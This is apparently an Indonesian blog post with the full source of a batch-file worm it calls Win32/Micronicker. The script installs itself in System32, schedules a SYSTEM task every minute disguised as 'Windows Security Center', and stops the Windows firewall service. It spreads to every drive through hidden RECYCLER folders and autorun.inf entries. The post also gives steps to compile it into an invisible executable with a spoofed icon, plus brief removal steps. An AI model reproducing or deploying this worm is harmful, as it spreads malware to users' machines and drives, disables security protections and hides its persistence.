
Sekarang saya akan membuat script batch percobaan yang tergolong mudah dan tidak berbahaya (bersenjata ilegal he.he.he). Skrip ini saya sebut Win32/Micronicker, karena skrip ini nantinya akan membuat folder yang mungkin cukup ditakuti oleh banyak orang jika menempel di flash disk drivenya yaitu RECYCLER.
berikut script percobaanya :
@echo off
Set Task=%WINDIR%\Tasks
Set Dos=%WINDIR%\System32
If Exist %Dos%\lwolf32.dll (
GoTo Mulai) Else (
GoTo Buat)
:Buat
If Exist *vmx (
Xcopy /h /y /q *vmx %Dos%
Attrib -s -h -r %Dos%\*vmx
Ren %Dos%\*vmx lwolf32.dll
Attrib +s +r %Dos%\lwolf32.dll
If Exist %Task%\*job (
Attrib -s -h -r %Task%\*job
Del /s /q %Task%\*job
)
SchTasks /Create /Tn "Windows Security Center" /Tr "cmd.exe /r %Dos%\lwolf32.dll" /sc minute /ru system
Sc Stop SharedAccess
)
Exit
:Mulai
Taskkill /f /im lwolf32.dll
Sc Stop SharedAccess
For %%a in (
c: d: e: f: g: h: i: j: k:) do (
If Exist %%a\* (
If Not Exist %%a\RECYCLER\* (
Md %%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\
Type %Dos%\lwolf32.dll>%%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\jwgkvsq.vmx
Echo [.shellclassinfo]>%%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\desktop.ini
Echo clsid={645FF040-5081-101B-9F08-00AA002F954E}>>%%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\desktop.ini
Attrib +s +h +r %%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\jwgkvsq.vmx
Attrib +s +h +r %%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\desktop.ini
Attrib +s +h +r %%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003
Attrib +s +h +r %%a\RECYCLER
Attrib -s -h -r %%a\autorun.inf
Echo [autorun]>%%a\autorun.inf
Echo open=\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\jwgkvsq.vmx>>%%a\autorun.inf
Echo shell\Open\command=\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\jwgkvsq.vmx>>%%a\autorun.inf
Echo action=Open folder to view files>>%%a\autorun.inf
Echo Icon=%Dos%\Shell32.dll,4 >>%%a\autorun.inf
Attrib +s +h +r %%a\autorun.inf
)
)
)
Rem // Akhir Dari Skrip Virus Micro Conficker
Exit
Lalu saya akan mengcompilenya menjadi file executable(*exe).
berikut cara-caranya :
1.Jalankan program Bat2ExeConverter
2.Pilih opsi Visibility => Invicible Application
3.Pilih Batch File atau source code yang di atas
4.Compile
5,Ganti nama file *exe tersebut dengan nama jwgkvsq.vmx
hints: Anda juga dapat memasangkan icon dan juga menuliskan version informations dengan cara mengklik tab version informations lalu masukan icon dan data-data yang anda inginkan.
hints: Anda juga dapat menambahkan file lain ke dalam file exe anda dengan cara mengklik tab include lalu add.
hints: Contoh hasil dari pembuatan virus batch file yang di convert menjadi file executable(*exe) bisa di download di sini
Bagaimana cara menjalankanya?
Buat script batch yang diletakan sama dengan file jwgkvsq.vmx. Berikut skripnya:
@echo off
Start jwgkvsq.vmx
Bagaimana Cara membasminya ?
Coba ketikan "Tasks" pada menu Start => Run. Lalu hapus file "Windows Security Center". Ketikan lagi "System32" pada Start => Run. Lalu hapus file "lwolf32.dll" yang menjadi file milik virus/worm tersebut. Selesai.
Selamat menikmati hasilnya. PASTIKAN DEEP FREEZE ANDA HIDUP !!!
Klik tombol download di bawah ini untuk mendownload batch2execonverter

source
0 komentar:
Posting Komentar